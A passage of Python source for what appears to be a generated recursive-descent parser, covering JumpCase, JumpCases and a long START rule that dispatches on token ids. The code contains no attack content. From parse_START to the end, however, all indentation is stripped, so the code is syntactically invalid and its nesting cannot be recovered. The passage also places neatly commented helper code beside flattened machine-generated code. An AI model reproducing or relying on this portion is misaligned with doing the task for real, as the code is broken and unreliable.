    """

    def eat(token_id):
        # Consume and return the next token iff its idint matches
        # token_id (identity test, mirroring the generated code's use of
        # `is` against a bound small-int constant).  On mismatch or EOF
        # return None and leave the offset untouched.
        try:
            tok = prim__tokens.array[prim__tokens.offset]
        except IndexError:
            return None
        if tok.idint is token_id:
            prim__tokens.offset += 1
            return tok
        return None

    def fail(message):
        # Standard failure tuple: offset is read at the moment of
        # failure, exactly as the original error branches did.
        return (False, prim__cons((prim__tokens.offset, message), prim__nil))

    start = prim__tokens.offset
    if len(prim__tokens.array) <= start:
        return (False, prim__cons((start, 'JumpCase got EOF'), prim__nil))
    lookahead = prim__tokens.array[start].idint
    if lookahead != 33 and lookahead != 43:
        return (False, prim__cons((start, 'JumpCase lookahead failed'), prim__nil))
    # Lookahead guaranteed a token is present: consume it unconditionally.
    slot_0 = prim__tokens.array[start]
    prim__tokens.offset = start + 1
    slot_1 = eat(32)
    if slot_1 is None:
        return fail('quote => not match')
    slot_2 = eat(44)
    if slot_2 is None:
        return fail('ID not match')
    return (True, prim__mk__ast('JumpCase', (slot_0, slot_1, slot_2)))
def parse_JumpCases(prim__state, prim__tokens):
    """Parse a JumpCases node: one JumpCase, then left-recursion loop.

    Mirrors parse_Instrs: a failure tuple from parse_JumpCase is
    returned unchanged; otherwise the parsed JumpCase is wrapped in a
    'JumpCases' AST node and passed to lr_loop_JumpCases to collect any
    further repetitions.
    """
    head = parse_JumpCase(prim__state, prim__tokens)
    if head[0] is False:
        # Propagate the (False, error-list) tuple unchanged.
        return head
    seed = prim__mk__ast('JumpCases', (head[1],))
    return lr_loop_JumpCases(seed, prim__state, prim__tokens)
def parse_START(prim__state, prim__tokens):
lcl_0 = 0
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_0):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_0 = _py_local_tk
_slot_0 = lcl_0
lcl_0 = (_slot_0 is None)
if lcl_0:
lcl_1 = prim__tokens.offset
lcl_1 = (lcl_1, 'BOF not match')
lcl_1 = prim__cons(lcl_1, prim__nil)
lcl_1 = lcl_1
lcl_1 = (False, lcl_1)
lcl_0 = lcl_1
else:
lcl_1 = 2
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_1):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_1 = _py_local_tk
_slot_1 = lcl_1
lcl_1 = (_slot_1 is None)
if lcl_1:
lcl_2 = prim__tokens.offset
lcl_2 = (lcl_2, 'quote runtime not match')
lcl_2 = prim__cons(lcl_2, prim__nil)
lcl_2 = lcl_2
lcl_2 = (False, lcl_2)
lcl_1 = lcl_2
else:
lcl_2 = 44
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_2):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_2 = _py_local_tk
_slot_2 = lcl_2
lcl_2 = (_slot_2 is None)
if lcl_2:
lcl_3 = prim__tokens.offset
lcl_3 = (lcl_3, 'ID not match')
lcl_3 = prim__cons(lcl_3, prim__nil)
lcl_3 = lcl_3
lcl_3 = (False, lcl_3)
lcl_2 = lcl_3
else:
lcl_3 = prim__tokens.offset
_off_3 = lcl_3
lcl_3 = (len(prim__tokens.array) > (prim__tokens.offset + 0))
if lcl_3:
lcl_5 = prim__tokens.array[(prim__tokens.offset + 0)]
lcl_5 = lcl_5.idint
if (lcl_5 == 24):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 30):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 4):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 15):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 25):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 13):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 12):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 10):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 11):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 37):
lcl_6 = parse_Attrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = parse_Instrs(prim__state, prim__tokens)
_slot_4_check = lcl_7
lcl_7 = _slot_4_check[0]
lcl_7 = (lcl_7 is False)
if lcl_7:
lcl_7 = _slot_4_check
else:
lcl_8 = _slot_4_check[1]
lcl_8 = lcl_8
_slot_4 = lcl_8
lcl_8 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_8):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_8 = _py_local_tk
_slot_5 = lcl_8
lcl_8 = (_slot_5 is None)
if lcl_8:
lcl_9 = prim__tokens.offset
lcl_9 = (lcl_9, 'EOF not match')
lcl_9 = prim__cons(lcl_9, prim__nil)
lcl_9 = lcl_9
lcl_9 = (False, lcl_9)
lcl_8 = lcl_9
else:
lcl_9 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4, _slot_5)
lcl_9 = prim__mk__ast('START', lcl_9)
_slot_local__1 = lcl_9
lcl_9 = (True, _slot_local__1)
lcl_8 = lcl_9
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 3):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 23):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 26):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 20):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 14):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 19):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 18):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 17):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 9):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 36):
lcl_6 = parse_Attrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = parse_Instrs(prim__state, prim__tokens)
_slot_4_check = lcl_7
lcl_7 = _slot_4_check[0]
lcl_7 = (lcl_7 is False)
if lcl_7:
lcl_7 = _slot_4_check
else:
lcl_8 = _slot_4_check[1]
lcl_8 = lcl_8
_slot_4 = lcl_8
lcl_8 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_8):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_8 = _py_local_tk
_slot_5 = lcl_8
lcl_8 = (_slot_5 is None)
if lcl_8:
lcl_9 = prim__tokens.offset
lcl_9 = (lcl_9, 'EOF not match')
lcl_9 = prim__cons(lcl_9, prim__nil)
lcl_9 = lcl_9
lcl_9 = (False, lcl_9)
lcl_8 = lcl_9
else:
lcl_9 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4, _slot_5)
lcl_9 = prim__mk__ast('START', lcl_9)
_slot_local__1 = lcl_9
lcl_9 = (True, _slot_local__1)
lcl_8 = lcl_9
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 39):
lcl_6 = parse_Attrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = parse_Instrs(prim__state, prim__tokens)
_slot_4_check = lcl_7
lcl_7 = _slot_4_check[0]
lcl_7 = (lcl_7 is False)
if lcl_7:
lcl_7 = _slot_4_check
else:
lcl_8 = _slot_4_check[1]
lcl_8 = lcl_8
_slot_4 = lcl_8
lcl_8 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_8):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_8 = _py_local_tk
_slot_5 = lcl_8
lcl_8 = (_slot_5 is None)
if lcl_8:
lcl_9 = prim__tokens.offset
lcl_9 = (lcl_9, 'EOF not match')
lcl_9 = prim__cons(lcl_9, prim__nil)
lcl_9 = lcl_9
lcl_9 = (False, lcl_9)
lcl_8 = lcl_9
else:
lcl_9 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4, _slot_5)
lcl_9 = prim__mk__ast('START', lcl_9)
_slot_local__1 = lcl_9
lcl_9 = (True, _slot_local__1)
lcl_8 = lcl_9
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 35):
lcl_6 = parse_Attrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = parse_Instrs(prim__state, prim__tokens)
_slot_4_check = lcl_7
lcl_7 = _slot_4_check[0]
lcl_7 = (lcl_7 is False)
if lcl_7:
lcl_7 = _slot_4_check
else:
lcl_8 = _slot_4_check[1]
lcl_8 = lcl_8
_slot_4 = lcl_8
lcl_8 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_8):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_8 = _py_local_tk
_slot_5 = lcl_8
lcl_8 = (_slot_5 is None)
if lcl_8:
lcl_9 = prim__tokens.offset
lcl_9 = (lcl_9, 'EOF not match')
lcl_9 = prim__cons(lcl_9, prim__nil)
lcl_9 = lcl_9
lcl_9 = (False, lcl_9)
lcl_8 = lcl_9
else:
lcl_9 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4, _slot_5)
lcl_9 = prim__mk__ast('START', lcl_9)
_slot_local__1 = lcl_9
lcl_9 = (True, _slot_local__1)
lcl_8 = lcl_9
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 8):
